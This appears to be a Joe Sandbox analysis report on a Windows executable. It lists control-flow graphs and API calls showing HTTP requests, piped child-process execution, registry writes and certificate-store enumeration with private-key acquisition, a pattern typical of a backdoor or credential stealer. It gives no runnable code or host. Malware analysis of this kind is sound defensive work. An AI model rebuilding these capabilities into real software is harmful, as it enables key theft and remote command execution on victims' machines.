7ff780b6e69b 4974->4975 4976 7ff780b619e4 4 API calls 4975->4976 4977 7ff780b6e6ab 4976->4977 4978 7ff780b61990 4 API calls 4977->4978 4979 7ff780b6e6ba 4978->4979 4980 7ff780b625b4 2 API calls 4979->4980 4980->4968 4981 7ff780b6250c 4986 7ff780b6213c 4981->4986 4984 7ff780b6253b 5029 7ff780b61c80 4986->5029 4989 7ff780b625b4 2 API calls 4990 7ff780b6219e 4989->4990 4991 7ff780b624e6 4990->4991 4992 7ff780b621ba WinHttpCrackUrl 4990->4992 4991->4984 5018 7ff780b61eec 4991->5018 4993 7ff780b624dd WinHttpCloseHandle 4992->4993 4994 7ff780b621e6 4992->4994 4993->4991 4995 7ff780b621f7 WinHttpConnect 4994->4995 4995->4993 4996 7ff780b62225 4995->4996 4996->4996 4997 7ff780b6228b WinHttpOpenRequest 4996->4997 4998 7ff780b624cd WinHttpCloseHandle 4997->4998 4999 7ff780b622ba 4997->4999 4998->4993 5000 7ff780b62304 WinHttpSendRequest 4999->5000 5001 7ff780b622c0 WinHttpQueryOption WinHttpSetOption 4999->5001 5002 7ff780b6232b WinHttpReceiveResponse 5000->5002 5003 7ff780b624c4 WinHttpCloseHandle 5000->5003 5001->5000 5002->5003 5004 7ff780b6233e 5002->5004 5003->4998 5005 7ff780b6e7c8 2 API calls 5004->5005 5006 7ff780b6234d WinHttpQueryDataAvailable 5005->5006 5007 7ff780b6e6d8 4 API calls 5006->5007 5008 7ff780b6236d WinHttpReadData 5007->5008 5009 7ff780b6238b 5008->5009 5009->5006 5010 7ff780b6e728 4 API calls 5009->5010 5012 7ff780b6239f 5009->5012 5010->5009 5011 7ff780b624ba 5011->5003 5012->5011 5033 7ff780b67a60 5012->5033 5057 7ff780b61de8 5018->5057 5021 7ff780b61f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 5023 7ff780b6262c 5021->5023 5022 7ff780b62121 5022->4984 5024 7ff780b61fa8 SafeArrayUnaccessData 5023->5024 5026 7ff780b61fd9 5024->5026 5027 7ff780b61ffe SysFreeString 5026->5027 5028 7ff780b61cbc 11 API calls 5026->5028 5027->5022 5028->5027 5030 7ff780b61ca1 5029->5030 5031 7ff780b61ca5 WinHttpOpen 5030->5031 5032 7ff780b679f0 2 API calls 5030->5032 5031->4989 5032->5031 5034 7ff780b67a84 5033->5034 5036 7ff780b624a5 5033->5036 5045 7ff780b625dc GetProcessHeap HeapAlloc 5034->5045 5037 7ff780b61cbc 5036->5037 5046 7ff780b6a51c 5037->5046 5047 7ff780b6a54d 5046->5047 5056 7ff780b625dc GetProcessHeap HeapAlloc 5047->5056 5063 7ff780b61b74 5057->5063 5059 7ff780b61e06 RegCreateKeyExA 5060 7ff780b61e3f CoInitializeEx VariantInit CoCreateInstance 5059->5060 5061 7ff780b61e46 5059->5061 5060->5021 5060->5022 5061->5061 5062 7ff780b61ea2 RegSetValueExA RegCloseKey 5061->5062 5062->5060 5064 7ff780b61bc3 5063->5064 5064->5059 4199 7ff780b69ac8 4200 7ff780b69af7 4199->4200 4201 7ff780b61990 4 API calls 4200->4201 4202 7ff780b69b02 4201->4202 4336 7ff780b69644 4202->4336 4204 7ff780b69b0b 4204->4204 4341 7ff780b6900c 4204->4341 4207 7ff780b6a4e0 4209 7ff780b61990 4 API calls 4207->4209 4210 7ff780b6a4f8 4209->4210 4211 7ff780b69b7a 4211->4207 4376 7ff780b697dc 4211->4376 4214 7ff780b61990 4 API calls 4215 7ff780b69bb4 4214->4215 4216 7ff780b697dc 16 API calls 4215->4216 4217 7ff780b69bcc 4216->4217 4217->4207 4218 7ff780b61990 4 API calls 4217->4218 4219 7ff780b69bdf 4218->4219 4220 7ff780b697dc 16 API calls 4219->4220 4221 7ff780b69bf7 4220->4221 4221->4207 4222 7ff780b61990 4 API calls 4221->4222 4223 7ff780b69c0a 4222->4223 4224 7ff780b697dc 16 API calls 4223->4224 4225 7ff780b69c22 4224->4225 4225->4207 4226 7ff780b61990 4 API calls 4225->4226 4227 7ff780b69c35 4226->4227 4228 7ff780b697dc 16 API calls 4227->4228 4229 7ff780b69c4d 4228->4229 4229->4207 4230 7ff780b61990 4 API calls 4229->4230 4231 7ff780b69c60 4230->4231 4232 7ff780b697dc 16 API calls 4231->4232 4233 7ff780b69c78 4232->4233 4233->4207 4234 7ff780b61990 4 API calls 4233->4234 4235 7ff780b69c8b 4234->4235 4236 7ff780b697dc 16 API calls 4235->4236 4237 7ff780b69ca3 4236->4237 4237->4207 4238 7ff780b61990 4 API calls 4237->4238 4239 7ff780b69cb6 4238->4239 4240 7ff780b697dc 16 API calls 4239->4240 4241 7ff780b69cce 4240->4241 4241->4207 4242 7ff780b61990 4 API calls 4241->4242 4243 7ff780b69ce1 4242->4243 4244 7ff780b697dc 16 API calls 4243->4244 4245 7ff780b69cf9 4244->4245 4245->4207 4246 7ff780b61990 4 API calls 4245->4246 4247 7ff780b69d0c 4246->4247 4248 7ff780b697dc 16 API calls 4247->4248 4249 7ff780b69d24 4248->4249 4249->4207 4250 7ff780b61990 4 API calls 4249->4250 4251 7ff780b69d37 4250->4251 4252 7ff780b697dc 16 API calls 4251->4252 4253 7ff780b69d4f 4252->4253 4253->4207 4254 7ff780b61990 4 API calls 4253->4254 4255 7ff780b69d62 4254->4255 4256 7ff780b697dc 16 API calls 4255->4256 4257 7ff780b69d7a 4256->4257 4257->4207 4258 7ff780b61990 4 API calls 4257->4258 4259 7ff780b69d8d 4258->4259 4260 7ff780b697dc 16 API calls 4259->4260 4261 7ff780b69da5 4260->4261 4261->4207 4262 7ff780b61990 4 API calls 4261->4262 4263 7ff780b69db8 4262->4263 4264 7ff780b697dc 16 API calls 4263->4264 4265 7ff780b69dd0 4264->4265 4265->4207 4266 7ff780b61990 4 API calls 4265->4266 4267 7ff780b69de3 4266->4267 4267->4267 4268 7ff780b697dc 16 API calls 4267->4268 4269 7ff780b69e43 4268->4269 4269->4207 4270 7ff780b61990 4 API calls 4269->4270 4271 7ff780b69e56 4270->4271 4271->4271 4272 7ff780b697dc 16 API calls 4271->4272 4273 7ff780b69eb2 4272->4273 4273->4207 4274 7ff780b61990 4 API calls 4273->4274 4275 7ff780b69ec5 4274->4275 4275->4275 4276 7ff780b697dc 16 API calls 4275->4276 4277 7ff780b69f2e 4276->4277 4277->4207 4278 7ff780b61990 4 API calls 4277->4278 4279 7ff780b69f41 4278->4279 4279->4279 4280 7ff780b697dc 16 API calls 4279->4280 4281 7ff780b69f9d 4280->4281 4281->4207 4282 7ff780b61990 4 API calls 4281->4282 4283 7ff780b69fb4 4282->4283 4283->4283 4284 7ff780b697dc 16 API calls 4283->4284 4285 7ff780b6a006 4284->4285 4285->4207 4286 7ff780b61990 4 API calls 4285->4286 4287 7ff780b6a01d 4286->4287 4287->4287 4288 7ff780b697dc 16 API calls 4287->4288 4289 7ff780b6a078 4288->4289 4289->4207 4290 7ff780b61990 4 API calls 4289->4290 4291 7ff780b6a092 4290->4291 4291->4291 4292 7ff780b697dc 16 API calls 4291->4292 4293 7ff780b6a0e4 4292->4293 4293->4207 4294 7ff780b61990 4 API calls 4293->4294 4295 7ff780b6a0f7 4294->4295 4295->4295 4296 7ff780b697dc 16 API calls 4295->4296 4297 7ff780b6a151 4296->4297 4297->4207 4298 7ff780b61990 4 API calls 4297->4298 4299 7ff780b6a164 4298->4299 4299->4299 4300 7ff780b697dc 16 API calls 4299->4300 4301 7ff780b6a1bd 4300->4301 4301->4207 4302 7ff780b61990 4 API calls 4301->4302 4303 7ff780b6a1d7 4302->4303 4303->4303 4304 7ff780b697dc 16 API calls 4303->4304 4305 7ff780b6a225 4304->4305 4305->4207 4306 7ff780b61990 4 API calls 4305->4306 4307 7ff780b6a238 4306->4307 4307->4307 4308 7ff780b697dc 16 API calls 4307->4308 4309 7ff780b6a289 4308->4309 4309->4207 4310 7ff780b61990 4 API calls 4309->4310 4311 7ff780b6a29c 4310->4311 4311->4311 4312 7ff780b697dc 16 API calls 4311->4312 4313 7ff780b6a2e6 4312->4313 4313->4207 4314 7ff780b61990 4 API calls 4313->4314 4315 7ff780b6a2f9 4314->4315 4315->4315 4316 7ff780b697dc 16 API calls 4315->4316 4317 7ff780b6a347 4316->4317 4317->4207 4318 7ff780b61990 4 API calls 4317->4318 4319 7ff780b6a35a 4318->4319 4319->4319 4320 7ff780b697dc 16 API calls 4319->4320 4321 7ff780b6a3a0 4320->4321 4321->4207 4322 7ff780b61990 4 API calls 4321->4322 4323 7ff780b6a3b3 4322->4323 4323->4323 4324 7ff780b697dc 16 API calls 4323->4324 4325 7ff780b6a419 4324->4325 4325->4207 4326 7ff780b61990 4 API calls 4325->4326 4327 7ff780b6a42c 4326->4327 4327->4327 4328 7ff780b697dc 16 API calls 4327->4328 4329 7ff780b6a47b 4328->4329 4329->4207 4330 7ff780b61990 4 API calls 4329->4330 4331 7ff780b6a48a 4330->4331 4332 7ff780b697dc 16 API calls 4331->4332 4333 7ff780b6a4d3 4332->4333 4333->4207 4334 7ff780b6a4d7 4333->4334 4425 7ff780b69478 4334->4425 4441 7ff780b6e7c8 4336->4441 4339 7ff780b6e7c8 2 API calls 4340 7ff780b69672 4339->4340 4340->4204 4445 7ff780b62554 4341->4445 4344 7ff780b69069 4348 7ff780b61990 4 API calls 4344->4348 4345 7ff780b690a3 CreatePipe 4346 7ff780b690e8 CreatePipe 4345->4346 4347 7ff780b690c1 4345->4347 4349 7ff780b69130 4346->4349 4351 7ff780b69106 4346->4351 4350 7ff780b61990 4 API calls 4347->4350 4352 7ff780b6907d GetLastError 4348->4352 4447 7ff780b67cfc 4349->4447 4353 7ff780b690d5 GetLastError 4350->4353 4354 7ff780b61990 4 API calls 4351->4354 4355 7ff780b6908e 4352->4355 4353->4355 4356 7ff780b6911a GetLastError 4354->4356 4358 7ff780b61a70 5 API calls 4355->4358 4356->4355 4359 7ff780b6909c 4358->4359 4359->4207 4368 7ff780b695a0 WaitForSingleObject 4359->4368 4360 7ff780b6917b CreateProcessW 4361 7ff780b625b4 2 API calls 4360->4361 4362 7ff780b691c7 4361->4362 4363 7ff780b691cb 4362->4363 4364 7ff780b691f5 CloseHandle 4362->4364 4365 7ff780b61990 4 API calls 4363->4365 4364->4359 4366 7ff780b691df GetLastError 4365->4366 4367 7ff780b691f0 4366->4367 4367->4364 4369 7ff780b69600 4368->4369 4370 7ff780b695c3 4368->4370 4369->4211 4371 7ff780b695d4 4370->4371 4452 7ff780b6968c PeekNamedPipe 4370->4452 4371->4369 4373 7ff780b695ee GetExitCodeProcess 4371->4373 4374 7ff780b6968c 6 API calls 4371->4374 4373->4369 4375 7ff780b695ea 4374->4375 4375->4369 4375->4373 4377 7ff780b61990 4 API calls 4376->4377 4378 7ff780b69813 4377->4378 4378->4378 4379 7ff780b61990 4 API calls 4378->4379 4380 7ff780b69877 4379->4380 4381 7ff780b679f0 2 API calls 4380->4381 4382 7ff780b6987f 4381->4382 4383 7ff780b619e4 4 API calls 4382->4383 4384 7ff780b6988d 4383->4384 4385 7ff780b625b4 2 API calls 4384->4385 4386 7ff780b69895 4385->4386 4387 7ff780b61990 4 API calls 4386->4387 4388 7ff780b698a4 4387->4388 4466 7ff780b69224 GetSystemTimeAsFileTime 4388->4466 4391 7ff780b6e6d8 4 API calls 4392 7ff780b698cd 4391->4392 4393 7ff780b6e6d8 4 API calls 4392->4393 4395 7ff780b698ed 4393->4395 4394 7ff780b699cf 4397 7ff780b61a70 5 API calls 4394->4397 4395->4394 4396 7ff780b61990 4 API calls 4395->4396 4398 7ff780b6993f 4396->4398 4399 7ff780b699ef 4397->4399 4400 7ff780b69943 4398->4400 4401 7ff780b69950 4398->4401 4402 7ff780b61990 4 API calls 4399->4402 4403 7ff780b619e4 4 API calls 4400->4403 4405 7ff780b679f0 2 API calls 4401->4405 4404 7ff780b699fe 4402->4404 4406 7ff780b6994e 4403->4406 4404->4207 4404->4214 4407 7ff780b69958 4405->4407 4409 7ff780b61990 4 API calls 4406->4409 4408 7ff780b619e4 4 API calls 4407->4408 4410 7ff780b69966 4408->4410 4412 7ff780b6997d 4409->4412 4411 7ff780b625b4 2 API calls 4410->4411 4411->4406 4413 7ff780b61990 4 API calls 4412->4413 4414 7ff780b69991 4413->4414 4415 7ff780b69995 4414->4415 4416 7ff780b699a2 4414->4416 4417 7ff780b619e4 4 API calls 4415->4417 4418 7ff780b679f0 2 API calls 4416->4418 4419 7ff780b699a0 4417->4419 4420 7ff780b699aa 4418->4420 4422 7ff780b61990 4 API calls 4419->4422 4421 7ff780b619e4 4 API calls 4420->4421 4423 7ff780b699b8 4421->4423 4422->4394 4424 7ff780b625b4 2 API calls 4423->4424 4424->4419 4487 7ff780b6971c 4425->4487 4428 7ff780b694fc WaitForSingleObject 4431 7ff780b69512 GetSystemTimeAsFileTime 4428->4431 4433 7ff780b6954d 4428->4433 4429 7ff780b694cf 4429->4428 4430 7ff780b6968c 6 API calls 4429->4430 4432 7ff780b69540 4429->4432 4439 7ff780b69534 TerminateProcess 4429->4439 4430->4429 4431->4429 4432->4207 4433->4432 4434 7ff780b69563 4433->4434 4436 7ff780b6968c 6 API calls 4433->4436 4434->4432 4435 7ff780b6957d GetExitCodeProcess 4434->4435 4437 7ff780b6968c 6 API calls 4434->4437 4435->4432 4438 7ff780b6958f CloseHandle 4435->4438 4436->4434 4440 7ff780b69579 4437->4440 4438->4432 4439->4432 4440->4432 4440->4435 4444 7ff780b625dc GetProcessHeap HeapAlloc 4441->4444 4443 7ff780b6965f 4443->4339 4446 7ff780b62561 CreatePipe 4445->4446 4446->4344 4446->4345 4448 7ff780b67d0e 4447->4448 4451 7ff780b625dc GetProcessHeap HeapAlloc 4448->4451 4450 7ff780b67d1d 4450->4360 4453 7ff780b696c2 4452->4453 4454 7ff780b696ca 4452->4454 4453->4454 4459 7ff780b6e6d8 4453->4459 4454->4371 4457 7ff780b69701 4463 7ff780b6e728 4457->4463 4460 7ff780b696dc ReadFile 4459->4460 4461 7ff780b6e6f5 4459->4461 4460->4454 4460->4457 4462 7ff780b62654 4 API calls 4461->4462 4462->4460 4464 7ff780b6e6d8 4 API calls 4463->4464 4465 7ff780b6e73d 4464->4465 4465->4454 4467 7ff780b69264 4466->4467 4486 7ff780b625dc GetProcessHeap HeapAlloc 4467->4486 4469 7ff780b692b1 4470 7ff780b6971c WriteFile 4469->4470 4471 7ff780b692fe 4470->4471 4472 7ff780b625b4 GetProcessHeap HeapFree 4471->4472 4477 7ff780b69306 4472->4477 4473 7ff780b693a2 WaitForSingleObject 4475 7ff780b693b8 GetSystemTimeAsFileTime 4473->4475 4476 7ff780b693f5 4473->4476 4474 7ff780b6968c 6 API calls 4474->4477 4475->4477 4476->4391 4477->4473 4477->4474 4477->4476 4478 7ff780b69418 WaitForSingleObject 4477->4478 4482 7ff780b693e9 TerminateProcess 4477->4482 4478->4476 4479 7ff780b6942e 4478->4479 4480 7ff780b6943e 4479->4480 4483 7ff780b6968c 6 API calls 4479->4483 4480->4476 4481 7ff780b69458 GetExitCodeProcess 4480->4481 4484 7ff780b6968c 6 API calls 4480->4484 4481->4476 4482->4476 4483->4480 4485 7ff780b69454 4484->4485 4485->4476 4485->4481 4488 7ff780b6974b 4487->4488 4490 7ff780b694ba GetSystemTimeAsFileTime 4488->4490 4491 7ff780b697a4 WriteFile 4488->4491 4490->4429 4492 7ff780b697c7 4491->4492 4492->4488 5065 7ff780b6dc08 5066 7ff780b6dc5c 5065->5066 5067 7ff780b61990 4 API calls 5066->5067 5068 7ff780b6dc92 5067->5068 5069 7ff780b61990 4 API calls 5068->5069 5070 7ff780b6dca9 5069->5070 5193 7ff780b6cbf0 RegOpenKeyExW 5070->5193 5072 7ff780b6dcc9 5073 7ff780b61990 4 API calls 5072->5073 5074 7ff780b6dd2c 5073->5074 5075 7ff780b61990 4 API calls 5074->5075 5076 7ff780b6dd43 5075->5076 5077 7ff780b6ccf4 6 API calls 5076->5077 5078 7ff780b6dd68 5077->5078 5079 7ff780b6deaf 5078->5079 5081 7ff780b6dd7c PathCombineW PathFileExistsW 5078->5081 5080 7ff780b61990 4 API calls 5079->5080 5082 7ff780b6debe 5080->5082 5083 7ff780b6de9c 5081->5083 5084 7ff780b6dda2 PathQuoteSpacesW 5081->5084 5088 7ff780b61990 4 API calls 5082->5088 5085 7ff780b625b4 2 API calls 5083->5085 5199 7ff780b6cfec 5084->5199 5085->5079 5087 7ff780b6ddb8 lstrcatW 5201 7ff780b6e8a0 5087->5201 5090 7ff780b6ded5 5088->5090 5092 7ff780b6cbf0 4 API calls 5090->5092 5094 7ff780b6deee 5092->5094 5093 7ff780b69644 2 API calls 5097 7ff780b6dde2 5093->5097 5095 7ff780b61990 4 API calls 5094->5095 5096 7ff780b6df0a 5095->5096 5098 7ff780b61990 4 API calls 5096->5098 5097->5097 5100 7ff780b6900c 16 API calls 5097->5100 5099 7ff780b6df19 5098->5099 5103 7ff780b61990 4 API calls 5099->5103 5101 7ff780b6de37 5100->5101 5102 7ff780b695a0 8 API calls 5101->5102 5107 7ff780b6de7d 5101->5107 5104 7ff780b6de4c 5102->5104 5105 7ff780b6df30 5103->5105 5106 7ff780b6de73 5104->5106 5108 7ff780b697dc 16 API calls 5104->5108 5109 7ff780b6df3c GetEnvironmentVariableW 5105->5109 5110 7ff780b69478 13 API calls 5106->5110 5111 7ff780b625b4 2 API calls 5107->5111 5112 7ff780b6de60 5108->5112 5113 7ff780b6df65 5109->5113 5114 7ff780b6e1e3 5109->5114 5110->5107 5111->5083 5112->5106 5117 7ff780b61990 4 API calls 5112->5117 5118 7ff780b6df71 PathAppendW PathFileExistsW 5113->5118 5115 7ff780b61990 4 API calls 5114->5115 5116 7ff780b6e1f2 5115->5116 5121 7ff780b61990 4 API calls 5116->5121 5117->5106 5118->5114 5119 7ff780b6df96 CreateFileW 5118->5119 5119->5114 5120 7ff780b6dfcb GetFileSize 5119->5120 5208 7ff780b625dc GetProcessHeap HeapAlloc 5120->5208 5123 7ff780b6e209 5121->5123 5127 7ff780b6cbf0 4 API calls 5123->5127 5128 7ff780b6e226 5127->5128 5132 7ff780b61990 4 API calls 5128->5132 5134 7ff780b6e242 5132->5134 5137 7ff780b61990 4 API calls 5134->5137 5138 7ff780b6e259 5137->5138 5142 7ff780b6e265 GetEnvironmentVariableW 5138->5142 5143 7ff780b6e378 5142->5143 5144 7ff780b6e288 5142->5144 5146 7ff780b61990 4 API calls 5143->5146 5147 7ff780b6e294 PathAppendW PathFileExistsW 5144->5147 5148 7ff780b6e387 5146->5148 5147->5143 5151 7ff780b6e2b9 CreateFileW 5147->5151 5152 7ff780b61990 4 API calls 5148->5152 5151->5143 5156 7ff780b6e2ee GetFileSize 5151->5156 5157 7ff780b6e396 5152->5157 5209 7ff780b62588 GetProcessHeap HeapAlloc 5156->5209 5194 7ff780b6ccd3 5193->5194 5195 7ff780b6cc43 RegEnumKeyExW 5193->5195 5194->5072 5196 7ff780b6cc79 RegEnumKeyExW 5195->5196 5197 7ff780b6ccc8 RegCloseKey 5195->5197 5196->5197 5197->5194 5200 7ff780b6d047 5199->5200 5200->5087 5202 7ff780b6e7c8 2 API calls 5201->5202 5203 7ff780b6e8bf 5202->5203 5210 7ff780b6e74c 5203->5210 5206 7ff780b6e6d8 4 API calls 5207 7ff780b6ddd5 5206->5207 5207->5093 5211 7ff780b6e767 5210->5211 5212 7ff780b6e793 5210->5212 5211->5212 5213 7ff780b6e6d8 4 API calls 5211->5213 5212->5206 5213->5211 5222 7ff780b614d4 5223 7ff780b61507 5222->5223 5224 7ff780b614ea 5222->5224 5224->5223 5225 7ff780b61501 RemoveVectoredExceptionHandler 5224->5225 5225->5223 5226 7ff780b668d4 5227 7ff780b668f7 5226->5227 5228 7ff780b67234 5 API calls 5227->5228 5229 7ff780b66971 5228->5229 5230 7ff780b67234 5 API calls 5229->5230 5231 7ff780b66990 5230->5231 5232 7ff780b67234 5 API calls 5231->5232 5233 7ff780b669af 5232->5233 5234 7ff780b672d4 5 API calls 5233->5234 5235 7ff780b669ce 5234->5235 5236 7ff780b66054 5237 7ff780b66077 5236->5237 5238 7ff780b67234 5 API calls 5237->5238 5239 7ff780b660f1 5238->5239 5240 7ff780b67234 5 API calls 5239->5240 5241 7ff780b66110 5240->5241 5242 7ff780b67234 5 API calls 5241->5242 5243 7ff780b6612f 5242->5243 5244 7ff780b67234 5 API calls 5243->5244 5245 7ff780b6619e 5244->5245 5246 7ff780b67234 5 API calls 5245->5246 5247 7ff780b661bd 5246->5247 5248 7ff780b672d4 5 API calls 5247->5248 5249 7ff780b661dc 5248->5249 5250 7ff780b6e4d0 lstrcpyW PathAppendW 5251 7ff780b6e51c 5250->5251 5252 7ff780b6ccf4 6 API calls 5251->5252 5254 7ff780b6e537 5252->5254 5253 7ff780b6e5ea 5254->5253 5255 7ff780b61990 4 API calls 5254->5255 5256 7ff780b6e556 5255->5256 5257 7ff780b619e4 4 API calls 5256->5257 5258 7ff780b6e561 5257->5258 5259 7ff780b61990 4 API calls 5258->5259 5260 7ff780b6e578 5259->5260 5261 7ff780b619e4 4 API calls 5260->5261 5262 7ff780b6e587 5261->5262 5262->5262 5263 7ff780b61990 4 API calls 5262->5263 5264 7ff780b6e5de 5263->5264 5265 7ff780b625b4 2 API calls 5264->5265 5265->5253

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize$CreateInstanceSecurity
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 89549506-0
                                                                                                                                                                • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                                                                • Instruction ID: 5a115f3e541478b1131f46627067dbb908af874077dbe5b669ce49c098620bbc
                                                                                                                                                                • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                                                                • Instruction Fuzzy Hash: 80118C73A14640DBF3109F65E8593AE7B74F34470DF608618DA491AA98CF3CD245CB94

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,00007FF780B61951,?,?,00000000,00007FF780B619BA), ref: 00007FF780B62669
                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,?,?,00007FF780B61951,?,?,00000000,00007FF780B619BA), ref: 00007FF780B6267A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1357844191-0
                                                                                                                                                                • Opcode ID: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
                                                                                                                                                                • Instruction ID: 68d1bab17c94239179f8226f64930a7cc70d35ab8dcdd6502a59291f47a7cde3
                                                                                                                                                                • Opcode Fuzzy Hash: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
                                                                                                                                                                • Instruction Fuzzy Hash: 24E08619A0998286F918ABD7BD540759621BF48FC0FA88430DE1F07BD5CE2CE4418720

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF780B62D90
                                                                                                                                                                • CertGetNameStringW.CRYPT32 ref: 00007FF780B62DD3
                                                                                                                                                                • CertNameToStrW.CRYPT32 ref: 00007FF780B62EB8
                                                                                                                                                                • CertNameToStrW.CRYPT32 ref: 00007FF780B62F0A
                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 00007FF780B62F4B
                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 00007FF780B62FC1
                                                                                                                                                                  • Part of subcall function 00007FF780B61A70: wvsprintfW.USER32 ref: 00007FF780B61AA9
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF
                                                                                                                                                                • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF780B63178
                                                                                                                                                                  • Part of subcall function 00007FF780B63220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6325E
                                                                                                                                                                  • Part of subcall function 00007FF780B63220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF780B6328D
                                                                                                                                                                  • Part of subcall function 00007FF780B63220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B632BB
                                                                                                                                                                  • Part of subcall function 00007FF780B63220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63336
                                                                                                                                                                  • Part of subcall function 00007FF780B63220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63380
                                                                                                                                                                  • Part of subcall function 00007FF780B63220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B633AC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                                                                                                                • String ID: 1.2.840.113549
                                                                                                                                                                • API String ID: 2787208766-3888290641
                                                                                                                                                                • Opcode ID: 545a1611eb2a54eb757bcc652c01f555a0221115e57e41545144f89a8227abb2
                                                                                                                                                                • Instruction ID: 22b50fb331683274e0f6a731b6b8aec93187b9096e3d65e4996c6a59d947b404
                                                                                                                                                                • Opcode Fuzzy Hash: 545a1611eb2a54eb757bcc652c01f555a0221115e57e41545144f89a8227abb2
                                                                                                                                                                • Instruction Fuzzy Hash: A8B1B466A0864289EB50EF56D8111BEEB65FB84BC4F940431EE9E07BD9DF3CE105CB60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2620922840-0
